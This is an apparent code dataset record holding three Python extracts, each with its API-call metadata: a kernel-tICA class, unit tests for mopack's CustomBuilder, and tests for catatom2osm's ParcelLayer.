        self._lag_time = lag_time
        self._n_components_nystroem = n_components_nystroem
        self._landmarks = landmarks
        self._gamma = gamma
        self._nystroem = Nystroem(gamma=gamma, n_components=n_components_nystroem)
        self._weights = weights
        self._shrinkage = shrinkage
        return

    def fit(self, sequence_list):
        """Fit the Nystroem map, then tICA on the transformed sequences."""
        if self._landmarks is None:
            self._nystroem.fit(np.concatenate(sequence_list))
        else:
            print("using landmarks")
            self._nystroem.fit(self._landmarks)
        sequence_transformed = [self._nystroem.transform(item) for item in sequence_list]
        # tICA is created here (not in __init__) because Koopman reweighting
        # requires the data at construction time.
        self._tica = py.coordinates.tica(sequence_transformed, lag=self._lag_time,
                                         dim=self._n_components, kinetic_map=True,
                                         weights=self._weights)
        return

    def transform(self, sequence_list):
        """Project sequences into the kernel-tICA space."""
        return self._tica.transform(
            [self._nystroem.transform(item) for item in sequence_list])

    def fit_transform(self, sequence_list):
        """Fit on the sequences and return their projection."""
        self.fit(sequence_list)
        return self.transform(sequence_list)

    def score(self, sequence_list):
        """Return the sum of tICA eigenvalues of a model refitted on the data.

        Bug fix: the refitted model previously fell back to the default
        weights='empirical' regardless of this model's setting; it now
        replicates self._weights as well.
        """
        model = self.__class__(n_components=self._n_components, lag_time=self._lag_time,
                               gamma=self._gamma,
                               n_components_nystroem=self._n_components_nystroem,
                               landmarks=self._landmarks,
                               shrinkage=self._shrinkage,
                               weights=self._weights)
        model.fit(sequence_list)
        return np.sum(model._tica.eigenvalues)
|
[
"sklearn.kernel_approximation.Nystroem",
"pyemma.coordinates.tica",
"numpy.sum",
"numpy.concatenate"
] |
[((975, 1032), 'sklearn.kernel_approximation.Nystroem', 'Nystroem', ([], {'gamma': 'gamma', 'n_components': 'n_components_nystroem'}), '(gamma=gamma, n_components=n_components_nystroem)\n', (983, 1032), False, 'from sklearn.kernel_approximation import Nystroem\n'), ((1691, 1822), 'pyemma.coordinates.tica', 'py.coordinates.tica', (['sequence_transformed'], {'lag': 'self._lag_time', 'dim': 'self._n_components', 'kinetic_map': '(True)', 'weights': 'self._weights'}), '(sequence_transformed, lag=self._lag_time, dim=self.\n _n_components, kinetic_map=True, weights=self._weights)\n', (1710, 1822), True, 'import numpy as np, pyemma as py\n'), ((2549, 2580), 'numpy.sum', 'np.sum', (['model._tica.eigenvalues'], {}), '(model._tica.eigenvalues)\n', (2555, 2580), True, 'import numpy as np, pyemma as py\n'), ((1313, 1342), 'numpy.concatenate', 'np.concatenate', (['sequence_list'], {}), '(sequence_list)\n', (1327, 1342), True, 'import numpy as np, pyemma as py\n')]
|
import os
import subprocess
from unittest import mock
from . import BuilderTest, MockPackage, through_json
from .. import mock_open_log
from mopack.builders import Builder
from mopack.builders.custom import CustomBuilder
from mopack.iterutils import iterate
from mopack.path import Path
from mopack.shell import ShellArguments
from mopack.usage.pkg_config import PkgConfigUsage
class TestCustomBuilder(BuilderTest):
    """Unit tests for CustomBuilder: building, deploying, cleaning and
    (re)hydrating packages driven by user-specified shell commands."""

    # Builder class instantiated by BuilderTest.make_builder().
    builder_type = CustomBuilder

    def check_build(self, builder, build_commands=None, *, submodules=None,
                    usage=None):
        """Run builder.build() with mocked I/O and verify each build command
        was invoked and that get_usage() returns `usage`.

        When `usage`/`build_commands` are omitted, the expected defaults for
        a pkg-config package named 'foo' are derived from `builder` itself.
        """
        if usage is None:
            pcfiles = ['foo']
            pcfiles.extend('foo_{}'.format(i) for i in iterate(submodules))
            usage = {'name': 'foo', 'type': 'pkg_config',
                     'path': [self.pkgconfdir('foo')], 'pcfiles': pcfiles,
                     'extra_args': []}
        if build_commands is None:
            builddir = os.path.join(self.pkgdir, 'build', builder.name)
            build_commands = [i.fill(srcdir=self.srcdir, builddir=builddir)
                              for i in builder.build_commands]
        with mock_open_log() as mopen, \
                mock.patch('mopack.builders.custom.pushd'), \
                mock.patch('subprocess.run') as mcall:  # noqa
            builder.build(self.pkgdir, self.srcdir)
            mopen.assert_called_with(os.path.join(
                self.pkgdir, 'logs', 'foo.log'
            ), 'a')
            for line in build_commands:
                mcall.assert_any_call(line, stdout=subprocess.PIPE,
                                      stderr=subprocess.STDOUT,
                                      universal_newlines=True, check=True)
        self.assertEqual(builder.get_usage(
            MockPackage(), submodules, self.pkgdir, self.srcdir
        ), usage)

    def test_basic(self):
        """String build commands are parsed into ShellArguments."""
        builder = self.make_builder('foo', build_commands=[
            'configure', 'make'
        ], usage='pkg_config')
        self.assertEqual(builder.name, 'foo')
        self.assertEqual(builder.build_commands, [
            ShellArguments(['configure']),
            ShellArguments(['make']),
        ])
        self.assertEqual(builder.deploy_commands, [])
        self.assertEqual(builder.usage, PkgConfigUsage(
            'foo', submodules=None, _options=self.make_options(),
            _path_bases=self.path_bases
        ))
        self.check_build(builder)

    def test_build_list(self):
        """List-form build commands are kept as argument vectors."""
        builder = self.make_builder('foo', build_commands=[
            ['configure', '--foo'], ['make', '-j2']
        ], usage='pkg_config')
        self.assertEqual(builder.name, 'foo')
        self.assertEqual(builder.build_commands, [
            ShellArguments(['configure', '--foo']),
            ShellArguments(['make', '-j2']),
        ])
        self.assertEqual(builder.deploy_commands, [])
        self.assertEqual(builder.usage, PkgConfigUsage(
            'foo', submodules=None, _options=self.make_options(),
            _path_bases=self.path_bases
        ))
        self.check_build(builder)

    def test_path_objects(self):
        """$srcdir/$builddir placeholders become Path objects and are filled
        in with the real directories at build time."""
        opts = self.make_options()
        builder = self.make_builder('foo', build_commands=[
            'configure $srcdir/build',
            ['make', '-C', '$builddir'],
        ], usage='pkg_config')
        self.assertEqual(builder.name, 'foo')
        self.assertEqual(builder.build_commands, [
            ShellArguments(['configure', (Path('', 'srcdir'), '/build')]),
            ShellArguments(['make', '-C', Path('', 'builddir')]),
        ])
        self.assertEqual(builder.deploy_commands, [])
        self.assertEqual(builder.usage, PkgConfigUsage(
            'foo', submodules=None, _options=opts, _path_bases=self.path_bases
        ))
        self.check_build(builder, build_commands=[
            ['configure', self.srcdir + '/build'],
            ['make', '-C', os.path.join(self.pkgdir, 'build', 'foo')],
        ])

    def test_deploy(self):
        """deploy() logs to the deploy log and runs the deploy commands."""
        builder = self.make_builder('foo', build_commands=['make'],
                                    deploy_commands=['make install'],
                                    usage='pkg_config')
        self.assertEqual(builder.name, 'foo')
        self.assertEqual(builder.build_commands, [
            ShellArguments(['make']),
        ])
        self.assertEqual(builder.deploy_commands, [
            ShellArguments(['make', 'install']),
        ])
        self.assertEqual(builder.usage, PkgConfigUsage(
            'foo', submodules=None, _options=self.make_options(),
            _path_bases=self.path_bases
        ))
        self.check_build(builder)

        with mock_open_log() as mopen, \
                mock.patch('mopack.builders.custom.pushd'), \
                mock.patch('subprocess.run') as mcall:  # noqa
            builder.deploy(self.pkgdir, self.srcdir)
            mopen.assert_called_with(os.path.join(
                self.pkgdir, 'logs', 'deploy', 'foo.log'
            ), 'a')
            mcall.assert_called_with(
                ['make', 'install'], stdout=subprocess.PIPE,
                stderr=subprocess.STDOUT, universal_newlines=True,
                check=True
            )

    def test_cd(self):
        """A 'cd' command is translated into an os.chdir() call."""
        opts = self.make_options()
        builder = self.make_builder('foo', build_commands=[
            'configure $srcdir/build',
            'cd $builddir',
            'make',
        ], usage='pkg_config')
        self.assertEqual(builder.name, 'foo')
        self.assertEqual(builder.build_commands, [
            ShellArguments(['configure', (Path('', 'srcdir'), '/build')]),
            ShellArguments(['cd', Path('', 'builddir')]),
            ShellArguments(['make']),
        ])
        self.assertEqual(builder.usage, PkgConfigUsage(
            'foo', submodules=None, _options=opts, _path_bases=self.path_bases
        ))

        with mock.patch('os.chdir') as mcd:
            builddir = os.path.join(self.pkgdir, 'build', 'foo')
            self.check_build(builder, build_commands=[
                ['configure', self.srcdir + '/build'],
                ['make'],
            ])
            mcd.assert_called_once_with(builddir)

    def test_cd_invalid(self):
        """'cd' with more than one argument raises RuntimeError."""
        builder = self.make_builder('foo', build_commands=[
            'cd foo bar',
        ], usage='pkg_config')
        with mock_open_log() as mopen, \
                mock.patch('mopack.builders.custom.pushd'), \
                self.assertRaises(RuntimeError):  # noqa
            builder.build(self.pkgdir, self.srcdir)

    def test_usage_full(self):
        """A dict-form usage with an explicit pkg-config path is honored."""
        builder = self.make_builder(
            'foo', build_commands=['make'],
            usage={'type': 'pkg_config', 'path': 'pkgconf'}
        )
        self.assertEqual(builder.name, 'foo')
        self.assertEqual(builder.build_commands, [
            ShellArguments(['make']),
        ])
        self.assertEqual(builder.usage, PkgConfigUsage(
            'foo', path='pkgconf', submodules=None,
            _options=self.make_options(), _path_bases=self.path_bases
        ))
        self.check_build(builder, usage={
            'name': 'foo', 'type': 'pkg_config',
            'path': [self.pkgconfdir('foo', 'pkgconf')], 'pcfiles': ['foo'],
            'extra_args': [],
        })

    def test_submodules(self):
        """Required/optional submodules produce the expected pcfiles."""
        submodules_required = {'names': '*', 'required': True}
        submodules_optional = {'names': '*', 'required': False}

        builder = self.make_builder(
            'foo', build_commands=['make'], usage='pkg_config',
            submodules=submodules_required
        )
        self.check_build(builder, submodules=['sub'], usage={
            'name': 'foo', 'type': 'pkg_config',
            'path': [self.pkgconfdir('foo')], 'pcfiles': ['foo_sub'],
            'extra_args': [],
        })

        builder = self.make_builder(
            'foo', build_commands=['make'],
            usage={'type': 'pkg_config', 'pcfile': 'bar'},
            submodules=submodules_required
        )
        self.check_build(builder, submodules=['sub'], usage={
            'name': 'foo', 'type': 'pkg_config',
            'path': [self.pkgconfdir('foo')], 'pcfiles': ['bar', 'foo_sub'],
            'extra_args': [],
        })

        builder = self.make_builder(
            'foo', build_commands=['make'], usage='pkg_config',
            submodules=submodules_optional
        )
        self.check_build(builder, submodules=['sub'])

        builder = self.make_builder(
            'foo', build_commands=['make'],
            usage={'type': 'pkg_config', 'pcfile': 'bar'},
            submodules=submodules_optional
        )
        self.check_build(builder, submodules=['sub'], usage={
            'name': 'foo', 'type': 'pkg_config',
            'path': [self.pkgconfdir('foo')], 'pcfiles': ['bar', 'foo_sub'],
            'extra_args': [],
        })

    def test_clean(self):
        """clean() removes the package's build directory."""
        builder = self.make_builder('foo', build_commands=['make'],
                                    usage='pkg_config')
        srcdir = os.path.join(self.pkgdir, 'build', 'foo')

        with mock.patch('shutil.rmtree') as mrmtree:
            builder.clean(self.pkgdir)
            mrmtree.assert_called_once_with(srcdir, ignore_errors=True)

    def test_rehydrate(self):
        """dehydrate()/rehydrate() round-trips a builder through JSON."""
        opts = self.make_options()
        builder = CustomBuilder('foo', build_commands=['make'],
                                submodules=None, _options=opts)
        builder.set_usage({'type': 'pkg_config', 'path': 'pkgconf'},
                          submodules=None)
        data = through_json(builder.dehydrate())
        self.assertEqual(builder, Builder.rehydrate(data, _options=opts))

    def test_upgrade(self):
        """Rehydrating a _version=0 payload goes through CustomBuilder.upgrade."""
        opts = self.make_options()
        data = {'type': 'custom', '_version': 0, 'name': 'foo',
                'build_commands': [], 'deploy_commands': None,
                'usage': {'type': 'system', '_version': 0}}
        with mock.patch.object(CustomBuilder, 'upgrade',
                               side_effect=CustomBuilder.upgrade) as m:
            pkg = Builder.rehydrate(data, _options=opts)
            self.assertIsInstance(pkg, CustomBuilder)
            m.assert_called_once()
|
[
"mopack.builders.Builder.rehydrate",
"unittest.mock.patch.object",
"mopack.shell.ShellArguments",
"mopack.path.Path",
"mopack.iterutils.iterate",
"unittest.mock.patch",
"mopack.usage.pkg_config.PkgConfigUsage",
"mopack.builders.custom.CustomBuilder",
"os.path.join"
] |
[((8989, 9030), 'os.path.join', 'os.path.join', (['self.pkgdir', '"""build"""', '"""foo"""'], {}), "(self.pkgdir, 'build', 'foo')\n", (9001, 9030), False, 'import os\n'), ((9280, 9357), 'mopack.builders.custom.CustomBuilder', 'CustomBuilder', (['"""foo"""'], {'build_commands': "['make']", 'submodules': 'None', '_options': 'opts'}), "('foo', build_commands=['make'], submodules=None, _options=opts)\n", (9293, 9357), False, 'from mopack.builders.custom import CustomBuilder\n'), ((925, 973), 'os.path.join', 'os.path.join', (['self.pkgdir', '"""build"""', 'builder.name'], {}), "(self.pkgdir, 'build', builder.name)\n", (937, 973), False, 'import os\n'), ((1168, 1210), 'unittest.mock.patch', 'mock.patch', (['"""mopack.builders.custom.pushd"""'], {}), "('mopack.builders.custom.pushd')\n", (1178, 1210), False, 'from unittest import mock\n'), ((1227, 1255), 'unittest.mock.patch', 'mock.patch', (['"""subprocess.run"""'], {}), "('subprocess.run')\n", (1237, 1255), False, 'from unittest import mock\n'), ((3644, 3731), 'mopack.usage.pkg_config.PkgConfigUsage', 'PkgConfigUsage', (['"""foo"""'], {'submodules': 'None', '_options': 'opts', '_path_bases': 'self.path_bases'}), "('foo', submodules=None, _options=opts, _path_bases=self.\n path_bases)\n", (3658, 3731), False, 'from mopack.usage.pkg_config import PkgConfigUsage\n'), ((4678, 4720), 'unittest.mock.patch', 'mock.patch', (['"""mopack.builders.custom.pushd"""'], {}), "('mopack.builders.custom.pushd')\n", (4688, 4720), False, 'from unittest import mock\n'), ((4737, 4765), 'unittest.mock.patch', 'mock.patch', (['"""subprocess.run"""'], {}), "('subprocess.run')\n", (4747, 4765), False, 'from unittest import mock\n'), ((5729, 5816), 'mopack.usage.pkg_config.PkgConfigUsage', 'PkgConfigUsage', (['"""foo"""'], {'submodules': 'None', '_options': 'opts', '_path_bases': 'self.path_bases'}), "('foo', submodules=None, _options=opts, _path_bases=self.\n path_bases)\n", (5743, 5816), False, 'from mopack.usage.pkg_config import 
PkgConfigUsage\n'), ((5849, 5871), 'unittest.mock.patch', 'mock.patch', (['"""os.chdir"""'], {}), "('os.chdir')\n", (5859, 5871), False, 'from unittest import mock\n'), ((5903, 5944), 'os.path.join', 'os.path.join', (['self.pkgdir', '"""build"""', '"""foo"""'], {}), "(self.pkgdir, 'build', 'foo')\n", (5915, 5944), False, 'import os\n'), ((6350, 6392), 'unittest.mock.patch', 'mock.patch', (['"""mopack.builders.custom.pushd"""'], {}), "('mopack.builders.custom.pushd')\n", (6360, 6392), False, 'from unittest import mock\n'), ((9045, 9072), 'unittest.mock.patch', 'mock.patch', (['"""shutil.rmtree"""'], {}), "('shutil.rmtree')\n", (9055, 9072), False, 'from unittest import mock\n'), ((9585, 9623), 'mopack.builders.Builder.rehydrate', 'Builder.rehydrate', (['data'], {'_options': 'opts'}), '(data, _options=opts)\n', (9602, 9623), False, 'from mopack.builders import Builder\n'), ((9889, 9967), 'unittest.mock.patch.object', 'mock.patch.object', (['CustomBuilder', '"""upgrade"""'], {'side_effect': 'CustomBuilder.upgrade'}), "(CustomBuilder, 'upgrade', side_effect=CustomBuilder.upgrade)\n", (9906, 9967), False, 'from unittest import mock\n'), ((10023, 10061), 'mopack.builders.Builder.rehydrate', 'Builder.rehydrate', (['data'], {'_options': 'opts'}), '(data, _options=opts)\n', (10040, 10061), False, 'from mopack.builders import Builder\n'), ((1363, 1407), 'os.path.join', 'os.path.join', (['self.pkgdir', '"""logs"""', '"""foo.log"""'], {}), "(self.pkgdir, 'logs', 'foo.log')\n", (1375, 1407), False, 'import os\n'), ((2076, 2105), 'mopack.shell.ShellArguments', 'ShellArguments', (["['configure']"], {}), "(['configure'])\n", (2090, 2105), False, 'from mopack.shell import ShellArguments\n'), ((2119, 2143), 'mopack.shell.ShellArguments', 'ShellArguments', (["['make']"], {}), "(['make'])\n", (2133, 2143), False, 'from mopack.shell import ShellArguments\n'), ((2702, 2740), 'mopack.shell.ShellArguments', 'ShellArguments', (["['configure', '--foo']"], {}), "(['configure', '--foo'])\n", 
(2716, 2740), False, 'from mopack.shell import ShellArguments\n'), ((2754, 2785), 'mopack.shell.ShellArguments', 'ShellArguments', (["['make', '-j2']"], {}), "(['make', '-j2'])\n", (2768, 2785), False, 'from mopack.shell import ShellArguments\n'), ((4266, 4290), 'mopack.shell.ShellArguments', 'ShellArguments', (["['make']"], {}), "(['make'])\n", (4280, 4290), False, 'from mopack.shell import ShellArguments\n'), ((4367, 4402), 'mopack.shell.ShellArguments', 'ShellArguments', (["['make', 'install']"], {}), "(['make', 'install'])\n", (4381, 4402), False, 'from mopack.shell import ShellArguments\n'), ((4874, 4928), 'os.path.join', 'os.path.join', (['self.pkgdir', '"""logs"""', '"""deploy"""', '"""foo.log"""'], {}), "(self.pkgdir, 'logs', 'deploy', 'foo.log')\n", (4886, 4928), False, 'import os\n'), ((5652, 5676), 'mopack.shell.ShellArguments', 'ShellArguments', (["['make']"], {}), "(['make'])\n", (5666, 5676), False, 'from mopack.shell import ShellArguments\n'), ((6794, 6818), 'mopack.shell.ShellArguments', 'ShellArguments', (["['make']"], {}), "(['make'])\n", (6808, 6818), False, 'from mopack.shell import ShellArguments\n'), ((674, 693), 'mopack.iterutils.iterate', 'iterate', (['submodules'], {}), '(submodules)\n', (681, 693), False, 'from mopack.iterutils import iterate\n'), ((3515, 3535), 'mopack.path.Path', 'Path', (['""""""', '"""builddir"""'], {}), "('', 'builddir')\n", (3519, 3535), False, 'from mopack.path import Path\n'), ((3880, 3921), 'os.path.join', 'os.path.join', (['self.pkgdir', '"""build"""', '"""foo"""'], {}), "(self.pkgdir, 'build', 'foo')\n", (3892, 3921), False, 'import os\n'), ((5616, 5636), 'mopack.path.Path', 'Path', (['""""""', '"""builddir"""'], {}), "('', 'builddir')\n", (5620, 5636), False, 'from mopack.path import Path\n'), ((3440, 3458), 'mopack.path.Path', 'Path', (['""""""', '"""srcdir"""'], {}), "('', 'srcdir')\n", (3444, 3458), False, 'from mopack.path import Path\n'), ((5549, 5567), 'mopack.path.Path', 'Path', (['""""""', 
'"""srcdir"""'], {}), "('', 'srcdir')\n", (5553, 5567), False, 'from mopack.path import Path\n')]
|
import logging
import unittest
import mock
from qgis.core import QgsVectorLayer
from catatom2osm.app import QgsSingleton
from catatom2osm.geo.geometry import Geometry
from catatom2osm.geo.layer.cons import ConsLayer
from catatom2osm.geo.layer.parcel import ParcelLayer
# Shared QGIS application singleton used by all tests in this module.
qgs = QgsSingleton()
# Module-wide logger mock patched into the layer modules; INFO level keeps
# progress logging code paths exercised without real output.
m_log = mock.MagicMock()
m_log.app_level = logging.INFO
class TestParcelLayer(unittest.TestCase):
    """Exercise ParcelLayer merge/count operations against GPKG fixtures.

    Every test gets a fresh 186-feature parcel layer and the matching
    construction (building) layer; the building layer drives all the
    parcel operations under test.
    """

    @mock.patch("catatom2osm.geo.layer.base.tqdm", mock.MagicMock())
    @mock.patch("catatom2osm.geo.layer.base.log", m_log)
    def setUp(self):
        # Load the parcel fixture (186 features) and the cons fixture into
        # an in-memory building layer; assert both loaded correctly.
        fn = "test/fixtures/parcel.gpkg|layername=parcel"
        self.parcel = ParcelLayer("38012")
        fixture = QgsVectorLayer(fn, "parcel", "ogr")
        self.assertTrue(fixture.isValid(), "Loading fixture")
        self.parcel.append(fixture)
        self.assertEqual(self.parcel.featureCount(), 186)
        fn = "test/fixtures/cons.gpkg|layername=cons"
        fixture2 = QgsVectorLayer(fn, "cons", "ogr")
        self.building = ConsLayer("MultiPolygon", "cons", "memory")
        self.building.append(fixture2)
        self.assertTrue(self.building.isValid(), "Loading fixture")

    def test_init(self):
        # Field layout ("localId", "parts") and the localId rename mapping.
        layer = ParcelLayer("38012")
        self.assertEqual(layer.fields()[0].name(), "localId")
        self.assertEqual(layer.fields()[1].name(), "parts")
        self.assertEqual(layer.rename["localId"], "inspireId_localId")

    def test_not_empty(self):
        # A freshly created layer already carries its schema.
        layer = ParcelLayer("38012")
        self.assertGreater(len(layer.fields().toList()), 0)

    def test_delete_void_parcels(self):
        # Parcels containing no building are dropped: 186 -> 110.
        self.parcel.delete_void_parcels(self.building)
        self.assertEqual(self.parcel.featureCount(), 110)

    def test_create_missing_parcels(self):
        # Buildings without a parcel get one created: 186 -> 188; the new
        # parcel for this ref is a single-ring multipolygon.
        self.parcel.create_missing_parcels(self.building)
        self.assertEqual(self.parcel.featureCount(), 188)
        p = next(self.parcel.search("localId = '8642317CS5284S'"))
        self.assertEqual(len(Geometry.get_multipolygon(p)[0]), 1)

    def test_get_groups_by_adjacent_buildings(self):
        # 21 adjacency groups covering 85 parcels in this fixture.
        self.parcel.create_missing_parcels(self.building)
        pa_groups, pa_refs, __ = self.parcel.get_groups_by_adjacent_buildings(
            self.building
        )
        self.assertEqual(len(pa_groups), 21)
        self.assertEqual(sum([len(gr) for gr in pa_groups]), 85)

    @mock.patch("catatom2osm.geo.layer.base.tqdm", mock.MagicMock())
    @mock.patch("catatom2osm.geo.layer.base.log", m_log)
    @mock.patch("catatom2osm.geo.layer.polygon.log", m_log)
    def test_merge_by_adjacent_buildings(self):
        # Merging must conserve the total parts count (pca == pcd) and
        # shrink the layer by exactly the number of merged parcels (cl).
        self.building.remove_outside_parts()
        self.building.explode_multi_parts()
        self.building.clean()
        self.parcel.delete_void_parcels(self.building)
        self.parcel.create_missing_parcels(self.building)
        self.parcel.count_parts(self.building)
        pca = sum([f["parts"] for f in self.parcel.getFeatures()])
        la = self.parcel.featureCount()
        tasks = self.parcel.merge_by_adjacent_buildings(self.building)
        pcd = sum([f["parts"] for f in self.parcel.getFeatures()])
        ld = self.parcel.featureCount()
        cl = len([k for k, v in tasks.items() if k != v])
        self.assertEqual(ld, la - cl)
        self.assertEqual(pca, pcd)
        pa_refs = [f["localId"] for f in self.parcel.getFeatures()]
        # Exact surviving parcel references after the merge.
        expected = [
            "001000300CS52D",
            "001000400CS52D",
            "8641608CS5284S",
            "8641612CS5284S",
            "8641613CS5284S",
            "8641616CS5284S",
            "8641620CS5284S",
            "8641621CS5284S",
            "8641632CS5284S",
            "8641636CS5284S",
            "8641638CS5284S",
            "8641649CS5284S",
            "8641653CS5284S",
            "8641658CS5284S",
            "8641660CS5284S",
            "8642302CS5284S",
            "8642310CS5284S",
            "8642312CS5284S",
            "8642313CS5284S",
            "8642314CS5284S",
            "8642317CS5284S",
            "8642321CS5284S",
            "8642325CS5484N",
            "8642701CS5284S",
            "8742701CS5284S",
            "8742707CS5284S",
            "8742711CS5284S",
            "8742721CS5284S",
            "8839301CS5283N",
            "8840501CS5284S",
            "8841602CS5284S",
            "8841603CS5284S",
            "8844121CS5284S",
            "8940301CS5284S",
            "8940302CS5284S",
            "8940305CS5284S",
            "8940306CS5284S",
            "8940307CS5284S",
            "8940309CS5284S",
            "8941505CS5284S",
            "9041703CS5294S",
            "9041704CS5294S",
            "9041705CS5294S",
            "9041716CS5294S",
            "9041719CS5294S",
            "9042401CS5294S",
            "9042402CS5294S",
            "9042404CS5294S",
        ]
        self.assertEqual(pa_refs, expected)
        f = next(self.parcel.search("localId = '8840501CS5284S'"))
        self.assertEqual(f["parts"], 11)
        # Every building whose ref disappeared must map to a different
        # (surviving) target in the merge task dictionary.
        merged = []
        for bu in self.building.getFeatures():
            if self.building.is_building(bu):
                ref = self.building.get_id(bu)
                if ref not in pa_refs:
                    merged.append(ref)
        self.assertEqual(len(merged), 71)
        self.assertTrue(all([tasks[ref] != ref for ref in merged]))

    @mock.patch("catatom2osm.geo.layer.base.tqdm", mock.MagicMock())
    @mock.patch("catatom2osm.geo.layer.base.log", m_log)
    @mock.patch("catatom2osm.geo.layer.polygon.log", m_log)
    def test_count_parts(self):
        # count_parts returns a per-parcel mapping and also writes the
        # "parts" attribute on each feature; both views must agree.
        self.building.remove_outside_parts()
        self.building.explode_multi_parts()
        self.building.clean()
        self.parcel.delete_void_parcels(self.building)
        self.parcel.create_missing_parcels(self.building)
        parts_count = self.parcel.count_parts(self.building)
        self.assertEqual(sum(parts_count.values()), 324)
        self.assertEqual(len(parts_count), self.parcel.featureCount())
        f = next(self.parcel.search("localId = '8840501CS5284S'"))
        self.assertEqual(f["parts"], 7)
        self.assertEqual(parts_count["8840501CS5284S"], 7)
        f = next(self.parcel.search("localId = '8840502CS5284S'"))
        self.assertEqual(f["parts"], 4)
        self.assertEqual(parts_count["8840502CS5284S"], 4)

    @mock.patch("catatom2osm.geo.layer.base.tqdm", mock.MagicMock())
    @mock.patch("catatom2osm.geo.layer.base.log", m_log)
    @mock.patch("catatom2osm.geo.layer.polygon.log", m_log)
    def test_get_groups_by_parts_count(self):
        # Groups are capped at 10 parts each and never span zone labels.
        self.building.remove_outside_parts()
        self.building.explode_multi_parts()
        self.building.clean()
        self.parcel.delete_void_parcels(self.building)
        self.parcel.create_missing_parcels(self.building)
        self.parcel.count_parts(self.building)
        self.parcel.merge_by_adjacent_buildings(self.building)
        features = {pa.id(): pa for pa in self.parcel.getFeatures()}
        (
            pa_groups,
            pa_refs,
            geometries,
            parts_count,
        ) = self.parcel.get_groups_by_parts_count(10, 100)
        self.assertEqual(len(parts_count), 48)
        self.assertEqual(len(pa_groups), 18)
        self.assertTrue(
            all(
                [
                    sum([parts_count[pa_refs[fid]] for fid in group]) <= 10
                    for group in pa_groups
                ]
            )
        )
        # Each group must lie entirely within a single zone.
        label_count = set(
            [
                len(set([self.parcel.get_zone(features[fid]) for fid in group]))
                for group in pa_groups
            ]
        )
        self.assertEqual(label_count, {1})

    @mock.patch("catatom2osm.geo.layer.base.tqdm", mock.MagicMock())
    @mock.patch("catatom2osm.geo.layer.base.log", m_log)
    @mock.patch("catatom2osm.geo.layer.polygon.log", m_log)
    def test_merge_by_parts_count(self):
        # As with adjacency merging: layer shrinks by the number of
        # non-identity tasks, total parts count is conserved.
        self.building.remove_outside_parts()
        self.building.explode_multi_parts()
        self.building.clean()
        self.parcel.delete_void_parcels(self.building)
        self.parcel.create_missing_parcels(self.building)
        self.parcel.merge_by_adjacent_buildings(self.building)
        pca = sum([f["parts"] for f in self.parcel.getFeatures()])
        la = self.parcel.featureCount()
        tasks = self.parcel.merge_by_parts_count(20, 30)
        pcd = sum([f["parts"] for f in self.parcel.getFeatures()])
        ld = self.parcel.featureCount()
        cl = len([k for k, v in tasks.items() if k != v])
        self.assertEqual(ld, la - cl)
        self.assertEqual(pca, pcd)
|
[
"qgis.core.QgsVectorLayer",
"catatom2osm.app.QgsSingleton",
"mock.patch",
"catatom2osm.geo.layer.parcel.ParcelLayer",
"catatom2osm.geo.layer.cons.ConsLayer",
"mock.MagicMock",
"catatom2osm.geo.geometry.Geometry.get_multipolygon"
] |
[((278, 292), 'catatom2osm.app.QgsSingleton', 'QgsSingleton', ([], {}), '()\n', (290, 292), False, 'from catatom2osm.app import QgsSingleton\n'), ((301, 317), 'mock.MagicMock', 'mock.MagicMock', ([], {}), '()\n', (315, 317), False, 'import mock\n'), ((467, 518), 'mock.patch', 'mock.patch', (['"""catatom2osm.geo.layer.base.log"""', 'm_log'], {}), "('catatom2osm.geo.layer.base.log', m_log)\n", (477, 518), False, 'import mock\n'), ((2376, 2427), 'mock.patch', 'mock.patch', (['"""catatom2osm.geo.layer.base.log"""', 'm_log'], {}), "('catatom2osm.geo.layer.base.log', m_log)\n", (2386, 2427), False, 'import mock\n'), ((2433, 2487), 'mock.patch', 'mock.patch', (['"""catatom2osm.geo.layer.polygon.log"""', 'm_log'], {}), "('catatom2osm.geo.layer.polygon.log', m_log)\n", (2443, 2487), False, 'import mock\n'), ((5345, 5396), 'mock.patch', 'mock.patch', (['"""catatom2osm.geo.layer.base.log"""', 'm_log'], {}), "('catatom2osm.geo.layer.base.log', m_log)\n", (5355, 5396), False, 'import mock\n'), ((5402, 5456), 'mock.patch', 'mock.patch', (['"""catatom2osm.geo.layer.polygon.log"""', 'm_log'], {}), "('catatom2osm.geo.layer.polygon.log', m_log)\n", (5412, 5456), False, 'import mock\n'), ((6317, 6368), 'mock.patch', 'mock.patch', (['"""catatom2osm.geo.layer.base.log"""', 'm_log'], {}), "('catatom2osm.geo.layer.base.log', m_log)\n", (6327, 6368), False, 'import mock\n'), ((6374, 6428), 'mock.patch', 'mock.patch', (['"""catatom2osm.geo.layer.polygon.log"""', 'm_log'], {}), "('catatom2osm.geo.layer.polygon.log', m_log)\n", (6384, 6428), False, 'import mock\n'), ((7664, 7715), 'mock.patch', 'mock.patch', (['"""catatom2osm.geo.layer.base.log"""', 'm_log'], {}), "('catatom2osm.geo.layer.base.log', m_log)\n", (7674, 7715), False, 'import mock\n'), ((7721, 7775), 'mock.patch', 'mock.patch', (['"""catatom2osm.geo.layer.polygon.log"""', 'm_log'], {}), "('catatom2osm.geo.layer.polygon.log', m_log)\n", (7731, 7775), False, 'import mock\n'), ((620, 640), 
'catatom2osm.geo.layer.parcel.ParcelLayer', 'ParcelLayer', (['"""38012"""'], {}), "('38012')\n", (631, 640), False, 'from catatom2osm.geo.layer.parcel import ParcelLayer\n'), ((659, 694), 'qgis.core.QgsVectorLayer', 'QgsVectorLayer', (['fn', '"""parcel"""', '"""ogr"""'], {}), "(fn, 'parcel', 'ogr')\n", (673, 694), False, 'from qgis.core import QgsVectorLayer\n'), ((924, 957), 'qgis.core.QgsVectorLayer', 'QgsVectorLayer', (['fn', '"""cons"""', '"""ogr"""'], {}), "(fn, 'cons', 'ogr')\n", (938, 957), False, 'from qgis.core import QgsVectorLayer\n'), ((982, 1025), 'catatom2osm.geo.layer.cons.ConsLayer', 'ConsLayer', (['"""MultiPolygon"""', '"""cons"""', '"""memory"""'], {}), "('MultiPolygon', 'cons', 'memory')\n", (991, 1025), False, 'from catatom2osm.geo.layer.cons import ConsLayer\n'), ((444, 460), 'mock.MagicMock', 'mock.MagicMock', ([], {}), '()\n', (458, 460), False, 'import mock\n'), ((1175, 1195), 'catatom2osm.geo.layer.parcel.ParcelLayer', 'ParcelLayer', (['"""38012"""'], {}), "('38012')\n", (1186, 1195), False, 'from catatom2osm.geo.layer.parcel import ParcelLayer\n'), ((1436, 1456), 'catatom2osm.geo.layer.parcel.ParcelLayer', 'ParcelLayer', (['"""38012"""'], {}), "('38012')\n", (1447, 1456), False, 'from catatom2osm.geo.layer.parcel import ParcelLayer\n'), ((2353, 2369), 